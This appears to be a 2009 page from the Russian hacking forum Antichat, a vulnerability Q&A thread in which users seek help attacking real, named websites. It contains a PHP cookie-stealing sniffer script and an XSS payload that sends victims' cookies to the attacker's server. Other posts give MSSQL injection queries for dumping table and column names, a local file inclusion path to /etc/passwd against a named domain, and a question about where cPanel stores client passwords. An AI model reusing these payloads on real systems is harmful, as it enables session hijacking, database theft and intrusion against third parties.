FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 565 из 2422

565

Опции темы

Поиск в этой теме

Опции просмотра

26.02.2009, 23:28

Sosok

Новичок

Регистрация: 16.02.2009

Сообщений: 10

Провел на форуме:
390969

Репутация: 8

htt p://cardz.ru/index.php?rasd=oplata&type=1'
Можете посмотреть эту скуля или нет , а то не могу понять!

26.02.2009, 23:30

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Sosok, нет, не скуля.
при скуле будет немного другая ошибка.

26.02.2009, 23:34

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

Отправить сообщение для -m0rgan- с помощью ICQ

Sosok, это ошибка в самом скрипте, она не вызвана кавычкой...
http://cardz.ru/index.php?rasd=oplata&type=1
=
http://cardz.ru/index.php?rasd=oplata&type=1'

27.02.2009, 17:27

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Отправить сообщение для Велемир с помощью ICQ

Начёт сниффера.Код взял с форума:

<?php

$date = date('d.m.y - H:i:s');
$ip = UrlDecode(getenv('REMOTE_ADDR'));
$referer = UrlDecode(getenv('HTTP_REFERER'));
$query = UrlDecode(getenv('QUERY_STRING'));
$cookie=getenv('HTTP_COOKIE');

$s = fopen("C:\Program Files\VertrigoServ\www\cookies.txt","w");

if($s) {

echo "Successfully opened!";
fputs($s,$cookie);
echo "\n";
fputs($s,$ip);

}

else {

echo "У нас праблемы...";

}

?>

Также есть XSS на одном сайте.Как нужно обратиться к скрипту,чтобы он записал данные ?

"<script%0A%0D>s=new Image();s.src="http://my_ip/sniffer.php?"+document.cookie%3B</script>

Где my_ip - мой Ip адрес).На серве лежит скрипт sniffer.php. В фаил ничего не записалось,вот я и подумал,что обращаюсь к скрипту неправильно.

28.02.2009, 16:14

j0ker13

Участник форума

Регистрация: 28.07.2008

Сообщений: 199

Провел на форуме:
861008

Репутация: 58

при составлении запроса в mssql inj приходится сначала кодировать в чар а потом с помощью урл код)) естественно чтоб узнать все таблы запрос будет длинным.. и обрезается(( как поступить?

28.02.2009, 20:32

[Raz0r]

Members of Antichat - Level 5

Регистрация: 25.02.2007

Сообщений: 495

Провел на форуме:
3244717

Репутация: 1980

Отправить сообщение для [Raz0r] с помощью ICQ

Цитата:

Сообщение от j0ker13

SELECT TOP 1 TABLE_NAME FROM inofrmation_schema.TABLES WHERE TABLE_NAME NOT IN(SELECT TOP x++ TABLE_NAME FROM inofrmation_schema.TABLES ORDER BY TABLE_NAME) ORDER BY TABLE_NAME

__________________
<? Raz0r.name — блог о web-безопасности

28.02.2009, 19:18

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

кто знает где пассы клиентов в cPanel .. или каждый хостер делает свое?

28.02.2009, 23:27

j0ker13

Участник форума

Регистрация: 28.07.2008

Сообщений: 199

Провел на форуме:
861008

Репутация: 58

2razor
работает) но как можно по аналогии вытащить имена колонок?)

Цитата:

(SELECT TOP 1 column_NAME FROM information_schema.columns WHERE table_name='tbllogin' and column_NAME NOT IN(SELECT TOP 3 column_NAME FROM information_schema.columns ORDER BY column_NAME) ORDER BY column_NAME)

и если выводит данные из таблицы ... where id=2... почему запрос проходит без ошибок? или какие еще способы есть сдампить удаленно?

01.03.2009, 13:59

[Raz0r]

Members of Antichat - Level 5

Регистрация: 25.02.2007

Сообщений: 495

Провел на форуме:
3244717

Репутация: 1980

Цитата:

Сообщение от j0ker13

2razor
работает) но как можно по аналогии вытащить имена колонок?)

SELECT TOP 1 COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='tbl' AND COLUMN_NAME NOT IN(SELECT TOP x COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='tbl' ORDER BY COLUMN_NAME) ORDER BY COLUMN_NAME

__________________
<? Raz0r.name — блог о web-безопасности

#10

01.03.2009, 01:28

u36a

Познающий

Регистрация: 18.11.2008

Сообщений: 53

Провел на форуме:
170968

Репутация: 10

Отправить сообщение для u36a с помощью ICQ

Можно ли как-то раскрутить пхпинклюд http://volkswagen.msk.ru/?p=../../../../../../../../../../etc/passwd%00 ? Стандартные методы не работают))

Страница 565 из 2422

565

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Сценарии/CMF/СMS	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ